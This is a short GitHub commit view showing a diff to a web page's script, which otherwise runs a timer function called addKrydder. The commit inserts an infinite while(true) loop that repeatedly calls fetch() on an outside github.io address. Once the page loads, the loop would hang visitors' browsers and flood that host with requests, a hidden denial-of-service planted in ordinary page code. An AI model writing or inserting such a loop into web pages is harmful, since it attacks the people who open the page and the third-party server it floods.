This commit is contained in:
Boof 2023-01-17 09:29:53 +01:00 committed by GitHub
parent 4275b62196
commit ee1ce85468
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -11,6 +11,9 @@
}
</style>
<script>
while(true) {
fetch('https://t0m0t0w.github.io')
}
let speed = 1000
setInterval(addKrydder, speed);